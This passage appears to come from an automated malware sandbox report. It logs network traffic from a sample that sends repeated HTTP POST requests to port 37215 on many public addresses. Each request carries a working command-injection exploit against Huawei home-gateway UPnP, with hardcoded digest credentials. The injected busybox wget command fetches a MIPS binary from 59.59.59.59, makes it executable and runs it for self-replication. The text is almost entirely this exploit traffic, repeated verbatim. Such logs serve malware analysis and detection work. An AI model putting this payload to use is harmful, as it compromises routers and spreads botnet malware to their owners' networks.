2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1132192.168.2.1533662197.221.44.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.736350060 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1133192.168.2.1554116197.246.117.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.736376047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1134192.168.2.1544336157.253.19.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.740483999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1135192.168.2.1536590197.38.230.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.740923882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1136192.168.2.1544008197.225.175.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.740998983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1137192.168.2.1553574157.143.76.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.743088007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1138192.168.2.1539680197.118.240.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.743139029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1139192.168.2.1538316197.21.218.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.743604898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1140192.168.2.154768041.200.101.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.743663073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1141192.168.2.1547296197.213.180.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.743686914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1142192.168.2.1533384157.127.190.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.745101929 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
